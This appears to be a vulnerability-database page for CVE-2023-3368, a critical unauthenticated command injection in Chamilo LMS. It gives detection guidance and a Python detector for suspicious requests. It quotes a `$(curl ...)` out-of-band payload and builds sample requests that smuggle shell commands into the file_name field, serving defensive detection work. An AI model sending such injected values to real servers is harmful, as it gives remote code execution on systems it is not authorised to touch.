CVE-2023-3368
published 2023-11-28

CVE-2023-3368: Command injection in `/main/webservices/additional_webservices.php` in Chamilo LMS <= v1.11.20 allows unauthenticated attackers to obtain remote code execution…

Priority: P1 · 90
Severity: critical · 9.8 (CVSS 3.1: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
In the wild: VulnCheck KEV · Exploited in the wild
EPSS: 68.90% (99.3rd percentile)
Command injection in `/main/webservices/additional_webservices.php` in Chamilo LMS <= v1.11.20 allows unauthenticated attackers to obtain remote code execution via improper neutralisation of special characters. This is a bypass of CVE-2023-34960.

Affected (2 ranges)

| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| chamilo | chamilo | < 1.11.20 | 1.11.20 |
| chamilo | chamilo | <= 1.11.20 | |

Detection & IOCs (extracted from sources)

path: `/main/webservices/additional_webservices.php`
command: `$(curl http://{{interactsh-url}}/)`
other: `wsConvertPptResponse`
  • The vulnerable endpoint is unauthenticated. Monitor POST requests to /main/webservices/additional_webservices.php regardless of session state, especially those containing shell metacharacters (e.g., `$()`, backticks, semicolons) in the `file_name` parameter.
  • Exploitation uses the SOAP web-service parameter `file_name` inside a `wsConvertPpt` request (the PPT-to-LP conversion service). A response body containing `wsConvertPptResponse` confirms that the request reached this operation; pair it with the request-side indicators above to confirm a successful hit.
  • The PoC payload injects a `$(curl ...)` command substitution into the `file_name` field alongside `service_ppt2lp_size` set to `720x540`. Alert on any `file_name` value containing `$(`, backtick command substitution, or other shell metacharacters in requests to this endpoint.
  • This CVE is an explicit bypass of CVE-2023-34960; if mitigations for CVE-2023-34960 are in place, they may be insufficient. Ensure detection rules cover both CVEs on the same endpoint.
  • The Nuclei template uses an out-of-band (interactsh) callback to confirm exploitation. In environments where outbound HTTP is blocked, the `$(curl ...)` payload will not produce a detectable callback; use alternative OOB channels or in-band detection (e.g., response timing, error messages) instead.
  • The vulnerability affects Chamilo LMS versions up to and including v1.11.20; later versions are not affected by this specific bypass.
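The request-side indicators above (endpoint path, `wsConvertPpt` operation, shell metacharacters in `file_name`) can be turned into a small classifier that runs over captured HTTP requests. The following is an added example written for this page, not code from Chamilo or from the Nuclei template. The only facts it relies on are the ones stated above; the exact SOAP envelope layout (a `pptData` wrapper holding `file_data`, `file_name` and `service_ppt2lp_size`), the hostnames, the session cookie name and the sample requests are constructed assumptions for illustration.

```python
"""Flag CVE-2023-3368 exploitation attempts in raw HTTP requests.

A request is an attempt when it targets the vulnerable web-service path and
its body carries a `file_name` value containing shell metacharacters.
"""
import re
from urllib.parse import urlsplit

VULN_PATH = "/main/webservices/additional_webservices.php"

# Shell constructs that have no business in a PPT file name: command
# substitution ($( ), backticks, ${ }), pipes and command separators.
SHELL_META = re.compile(r"\$\(|`|\$\{|[;|&]")

# `file_name` may arrive as a SOAP element or as a form-encoded field.
FILE_NAME_PATTERNS = [
    re.compile(r"<file_name[^>]*>(.*?)</file_name>", re.S | re.I),
    re.compile(r"(?:^|&)file_name=([^&]*)"),
]


def parse_request(raw: str):
    """Split a raw HTTP/1.1 request into (method, path, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, urlsplit(target).path, headers, body


def extract_file_name(body: str):
    """Return the file_name value from a SOAP or form body, or None."""
    for pattern in FILE_NAME_PATTERNS:
        match = pattern.search(body)
        if match:
            return match.group(1)
    return None


def classify(raw: str) -> dict:
    """Collect the per-request indicators described in the IOC list."""
    method, path, headers, body = parse_request(raw)
    verdict = {
        "method": method,
        "path": path,
        "targets_endpoint": path == VULN_PATH,
        "ws_convert_ppt": "wsConvertPpt" in body,
        "has_session_cookie": "cookie" in headers,  # informational only
        "file_name": None,
        "shell_meta": False,
    }
    if not verdict["targets_endpoint"]:
        return verdict
    file_name = extract_file_name(body)
    verdict["file_name"] = file_name
    verdict["shell_meta"] = bool(file_name and SHELL_META.search(file_name))
    return verdict


def is_exploit_attempt(raw: str) -> bool:
    """True when the request hits the endpoint with a tainted file_name."""
    verdict = classify(raw)
    return verdict["targets_endpoint"] and verdict["shell_meta"]


# --- constructed sample requests (assumed SOAP layout, fake host) ---------
def _soap(file_name: str) -> str:
    return (
        '<?xml version="1.0" encoding="utf-8"?>'
        '<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">'
        "<soap:Body><wsConvertPpt><pptData>"
        "<file_data>UEsDBBQ=</file_data>"
        f"<file_name>{file_name}</file_name>"
        "<service_ppt2lp_size>720x540</service_ppt2lp_size>"
        "</pptData></wsConvertPpt></soap:Body></soap:Envelope>"
    )


def _req(body: str, path: str = VULN_PATH, cookie: str = "") -> str:
    headers = [f"POST {path} HTTP/1.1", "Host: lms.example.test",
               "Content-Type: text/xml; charset=utf-8", 'SOAPAction: ""']
    if cookie:
        headers.append(f"Cookie: {cookie}")
    headers.append(f"Content-Length: {len(body)}")
    return "\r\n".join(headers) + "\r\n\r\n" + body


MALICIOUS = _req(_soap("$(curl http://{{interactsh-url}}/).pptx"))
BACKTICK = _req(_soap("`id`.pptx"))
BENIGN = _req(_soap("lecture1.pptx"), cookie="ch_sid=abc123")
OTHER_PATH = _req(_soap("$(id).pptx"), path="/index.php")

if __name__ == "__main__":
    for label, sample in [("malicious", MALICIOUS), ("backtick", BACKTICK),
                          ("benign", BENIGN), ("other_path", OTHER_PATH)]:
        print(f"{label:10s} attempt={is_exploit_attempt(sample)} {classify(sample)}")
```

The session-cookie flag is recorded but deliberately not used in the verdict: the endpoint is unauthenticated, so the presence of a session says nothing about whether the request is an attack. A pipeline that only has the response side can still use `wsConvertPptResponse` as the confirmation signal described above, but the request-side check is what tells a benign conversion from an injection.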

CVSS provenance

NVD: v3.1 · 9.8 CRITICAL · CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
VulnCheck: 9.8 CRITICAL